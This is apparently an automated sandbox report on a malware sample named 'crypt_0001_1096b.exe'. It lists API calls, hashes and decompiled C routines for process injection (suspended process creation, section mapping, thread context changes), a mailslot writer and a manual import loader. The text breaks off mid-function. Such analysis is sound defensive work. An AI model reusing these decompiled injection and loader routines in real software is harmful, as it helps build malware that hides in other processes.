Function 002E2CD0, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 108 Total matches: 183string
Similarity
  • Total matches: 183
  • API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
  • String ID: <
  • API String ID: 1457465641-4251816714
  • Opcode ID: 3f2b9fcc2af1264bbed65c952509bd9e2800f2d6ba6530589bf9dcfa6290030a
  • Instruction ID: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
  • Opcode Fuzzy Hash: 03F0AC60AB2683C5CCF35840E54579D87C06B21A79C8C4B315508F45A77F28325F4F6C
  • Instruction Fuzzy Hash: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
APIs
  • memset.NTDLL ref: 002E2CEE
  • CoInitializeEx.OLE32(00000000,00000002), ref: 002E2CF9
  • PathFindExtensionW.SHLWAPI(00000000), ref: 002E2D14
  • lstrcpyW.KERNEL32(00000000,002E8224), ref: 002E2D29
  • lstrlen.KERNEL32(002E7494,?,?,?,?,?,?,?,?,?,?,002E18D7,?), ref: 002E2D46
  • lstrcpyW.KERNEL32(00000000,002E84B8), ref: 002E2D77
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • wsprintfW.USER32 ref: 002E2DAE
  • ShellExecuteExW.SHELL32(0000003C), ref: 002E2DE3
  • CoUninitialize.OLE32 ref: 002E2DF7
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E4B0D, Relevance: 9.0, APIs: 6, Instructions: 40 Total matches: 320file
Similarity
  • Total matches: 320
  • API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
  • String ID:
  • API String ID: 3756146440-0
  • Opcode ID: 13a3fbb8c54243ae1405e1c57313f2c46c53332a02a93cc9283264dcae27056a
  • Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
  • Opcode Fuzzy Hash: 49D0224D1F030BD4C82394A2E0C2F10C6823F32100D3C022402082836B8F3631EFDE6D
  • Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
APIs
  • CreateFileW.KERNEL32(002E7494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 002E4B26
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B33
  • WriteFile.KERNEL32(00000000,?,00001000,002E7494,00000000), ref: 002E4B49
  • SetEndOfFile.KERNEL32(00000000,?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B54
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B5C
  • CloseHandle.KERNEL32(00000000), ref: 002E4B65
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E1395, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71 Total matches: 162processmemory
Similarity
  • Total matches: 162
  • API ID: CreateProcessGetLastErrorHeapFreememset
  • String ID: D
  • API String ID: 1501718689-2746444292
  • Opcode ID: ec666d8859198cc6dc2f36418ca03840fabeabaa94e38ef7fe01e5326dfd4177
  • Instruction ID: 110f424a9e0f0e5d3f86d35bf262195d206ca1f37b0b6fadae47027560f24ba8
  • Opcode Fuzzy Hash: 73E0D8861F0CD5D2C8946488F1A3F51E7202F9045ACCEA72106A9281676E24F45F8BA9
  • Instruction Fuzzy Hash: 110f424a9e0f0e5d3f86d35bf262195d206ca1f37b0b6fadae47027560f24ba8
APIs
  • memset.NTDLL ref: 002E13B5
    • Part of subcall function 002E3340: GetProcAddress.KERNEL32(002E866B,002E45D9,00000000,002E618C,00000000,00000000,?,?,?,002E11A6,?,002E618C,00000000,00000000), ref: 002E3354
  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,04000004,00000000,00000000,00000044,?), ref: 002E13EE
  • GetLastError.KERNEL32(00000001), ref: 002E1422
  • HeapFree.KERNEL32(00000000,00000000), ref: 002E1433
    • Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
    • Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
    • Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E4A60, Relevance: 7.6, APIs: 5, Instructions: 72 Total matches: 377file
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 9f3baee91e90600c7ef65055cc937090c80b1848b2f2516f31576c2ec84c2916
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E02608AE0A47CCD46B9C42D482F00A7826F61609DAD39655208293734F2132AFEB3C
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E4A7E
  • GetFileSize.KERNEL32(00000000,00000000,?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4A8E
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 002E4ABA
  • GetLastError.KERNEL32(?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4ADF
  • CloseHandle.KERNEL32(000000FF), ref: 002E4AF0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E2175, Relevance: 6.1, APIs: 4, Instructions: 107 Total matches: 388threadsynchronizationinjection
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 97ca6bb9ca5fe7b510779c132f311c73afcc437a32033944fe2e30fe2d70fbee
  • Instruction ID: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
  • Opcode Fuzzy Hash: B5019C47292A71C6D501A8068699739F1C3FB42EBAE2CF700D6C1B01DA0ED479F2DB6C
  • Instruction Fuzzy Hash: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
APIs
  • memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E1FFA: memset.NTDLL ref: 002E2036
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
  • SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E372A, Relevance: 5.1, APIs: 4, Instructions: 110 Total matches: 409
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: 752983b3e7944d967bfc605664b24e9bd319d7a804b265e52fc9e08d56eeb1c9
  • Instruction ID: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
  • Opcode Fuzzy Hash: C60170421A6E65C8F471D947689AB3BF487FF967F6D09F70020C23028E4E8061D71F89
  • Instruction Fuzzy Hash: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
APIs
  • memset.NTDLL ref: 002E3750
  • memcpy.NTDLL ref: 002E3778
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
  • GetLastError.KERNEL32(00000010,00000218,002E4F6D,00000100,?,00000318,00000008), ref: 002E378F
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,002E4F6D,00000100), ref: 002E3872
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Process Name: crypt_0001_1096b.exe Analysis ID: 64003

General

Root Process Name:Zx7i3Q9U9i.exe
Process MD5:34C71A2B5584813A6BC94888E3669320
Total matches:32
Initial Analysis Report:Open
Initial sample Analysis ID:64003
Initial sample SHA 256:34CD6B92357754175CDC0BCA3CDA8C2AA439CDFBCC03683EE3B3D502E4C71151
Initial sample name:crypt_0001_1096b.exe

Similar Executed Functions

Function 002E3880, Relevance: 7.6, APIs: 5, Instructions: 93 Total matches: 233nativethread
Similarity
  • Total matches: 233
  • API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 405287775-0
  • Opcode ID: 16422fa5cbcf997cf8d8ddf4094cfe996cac4ccb4206dd4e90c3df64a56a7186
  • Instruction ID: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
  • Opcode Fuzzy Hash: FEF00C400F9BA0EBF812B6821491F547683BB02F32E0EF32051F200B863F02200E8B1A
  • Instruction Fuzzy Hash: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
APIs
  • memset.NTDLL ref: 002E38A2
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 002E3995
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
  • memcpy.NTDLL(00000218,002E4F92,00000100,?,00010003,?,?,00000318,00000008), ref: 002E391D
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 002E3974
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3977
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E278F, Relevance: 6.1, APIs: 4, Instructions: 79 Total matches: 297native
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: b4b338d5d8f61f66a6222dbf3d0f3f210939ec075dfbdcc0bd39eb5c8c15d6ad
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: FCE0C04226CAC4E7E9F2F8451403B2B9140BF80142D5D7BA663A88D67F0F20B0031B1E
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
  • memset.NTDLL ref: 002E280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
  • NtClose.NTDLL(?), ref: 002E283F
    • Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
    • Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3E68, Relevance: 4.5, APIs: 3, Instructions: 29 Total matches: 229memorynative
Similarity
  • Total matches: 229
  • API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3367774474-0
  • Opcode ID: 41e13fcf86dc4b3d751067dcd296ed22fbfc5f147028583741b35f2a38466cce
  • Instruction ID: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
  • Opcode Fuzzy Hash: B0C012801C1D82EAD57B9488419DB2A119677A1101C1D733211809D5407FA0305B0F1D
  • Instruction Fuzzy Hash: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
APIs
  • NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
  • SetLastError.KERNEL32(00000000), ref: 002E3EA7
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3E27, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 236native
Similarity
  • Total matches: 236
  • API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 1449157707-0
  • Opcode ID: 2ed1afa1f8d583104eaac44049c4c607334b4aa5ab8e72b653f2dcbc79efa973
  • Instruction ID: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
  • Opcode Fuzzy Hash: 95C0928B1505C74DDB3AA98181EEF4DC2C57FB177342C31094088C972E598A326B4E49
  • Instruction Fuzzy Hash: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
APIs
  • NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
  • SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3DE6, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 238native
Similarity
  • Total matches: 238
  • API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3946382534-0
  • Opcode ID: aed4696055f3d46c6fa4a2efaa20ff5ea458cda21972fc3345feb9d6d727ddb0
  • Instruction ID: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
  • Opcode Fuzzy Hash: 09C092CB1415C74DDB3AA99281EAF4DC2C57EB177342C31094088C971E598A366B4E49
  • Instruction Fuzzy Hash: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
APIs
  • NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
  • SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401639, Relevance: 16.6, APIs: 11, Instructions: 85 Total matches: 95threadsynchronization
Similarity
  • Total matches: 95
  • API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
  • String ID:
  • API String ID: 2699342322-0
  • Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
  • Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
  • Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
  • Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
C-Code - Quality: 100%
			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}













0x00401647
0x0040164f
0x00401664
0x0040166e
0x00401672
0x00401675
0x00401713
0x0040167b
0x0040168c
0x0040168e
0x00401692
0x00401695
0x004016fe
0x00401697
0x004016a0
0x004016a3
0x004016b4
0x004016e7
0x004016bb
0x004016c0
0x004016cd
0x004016d7
0x004016dc
0x004016dc
0x004016cd
0x004016f0
0x004016f0
0x00401704
0x0040170a
0x0040171c

APIs
  • CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
  • CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
  • GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
  • GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,757DC470,004016DC,?,?,00000000), ref: 004015B9
  • TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
  • CloseHandle.KERNEL32(?), ref: 004016F0
  • GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
  • CloseHandle.KERNEL32(?), ref: 00401704
  • GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 004010FB, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90 Total matches: 95sleepfile
Similarity
  • Total matches: 95
  • API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
  • String ID: \\.\mailslot\msl0
  • API String ID: 1001206095-622273203
  • Opcode ID: 003b2913688191ea114162166813de589c119e69325853280e698207d87bc8a2
  • Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
  • Opcode Fuzzy Hash: DFF02E85425EC28BC77E20443911BE16086B782F42C6CC3B29ED2342AB8F40710A9746
  • Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
C-Code - Quality: 94%
			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}

















0x004010fb
0x004010fb
0x00401104
0x00401107
0x00401118
0x00401121
0x00401124
0x00401139
0x00401126
0x0040112e
0x00401131
0x00401131
0x0040113c
0x00401145
0x004011ea
0x004011ef
0x004011ef
0x00401158
0x0040115f
0x004011da
0x004011e1
0x004011e4
0x00000000
0x004011e4
0x00401161
0x00401164
0x00401165
0x00401168
0x0040116e
0x00401170
0x00401173
0x00401175
0x00401175
0x0040118a
0x00401192
0x004011a8
0x004011b1
0x004011b4
0x00000000
0x00000000
0x00401194
0x00401194
0x00401197
0x0040119a
0x0040119c
0x004011a2
0x004011a3
0x004011a3
0x0040119c
0x004011b8
0x004011be
0x004011c8
0x004011d1
0x00000000

APIs
  • CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
  • GetLastError.KERNEL32 ref: 00401126
  • Sleep.KERNEL32(00000064), ref: 00401131
    • Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806
  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
  • GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
  • Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
  • memset.NTDLL ref: 004011C8
    • Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00401589,00401589), ref: 00401213
  • CloseHandle.KERNEL32(?), ref: 004011E4
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E1224, Relevance: 13.6, APIs: 9, Instructions: 77 Total matches: 182registrymemorystring
Similarity
  • Total matches: 182
  • API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
  • String ID:
  • API String ID: 1756712956-0
  • Opcode ID: f2f8398e5a378612a0451dc2799ca230d083f10daad558b8caa29df948c1a906
  • Instruction ID: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
  • Opcode Fuzzy Hash: 73F027808E89B3CAC953D045D9CE7B64644BF90B5FC8C13A02480291551F6034EB3B5D
  • Instruction Fuzzy Hash: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
APIs
  • PathFindFileNameW.SHLWAPI(002E618C), ref: 002E1246
  • lstrcmpiW.KERNEL32(00000000,?,002E7494), ref: 002E124D
  • RegOpenKeyExA.KERNEL32(80000001,002E8080,00000000,00000000,?,?,002E7494), ref: 002E127E
  • lstrlenW.KERNEL32(?,002E7494), ref: 002E1292
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 002E12AA
  • RegQueryValueExW.KERNEL32(?,00000000,002E7494,00000000,002E7494,?,002E7494), ref: 002E12C9
  • StrStrIW.SHLWAPI(00000000), ref: 002E12E4
  • HeapFree.KERNEL32(00000000,00000000), ref: 002E12F9
  • RegCloseKey.ADVAPI32(?,?,002E7494), ref: 002E1302
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401389, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89 Total matches: 143librarystringloader
Similarity
  • Total matches: 143
  • API ID: lstrlenmemset$GetProcAddressLoadLibrary
  • String ID: ~
  • API String ID: 3655391705-1707062198
  • Opcode ID: 23239c877e3e9023a5525b3a16ecfaaed23ea4db6e96668c4a9e8c62ae4ebe7f
  • Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
  • Opcode Fuzzy Hash: EFF0590D195F71C6E16D6405187B7AA7082F39270BD14E9070193B31076880B3242F8C
  • Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
C-Code - Quality: 100%
			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;
				_t23 =  *((intOrPtr*)(_t34 + 0xc));
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44); // executed
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44));
					_t27 =  *_t34;
					_t35 =  *((intOrPtr*)(_t34 + 0x10));
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20));
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;
						_t57 = _t28;
						L8:
						L8:
						if(_t57 < 0) {
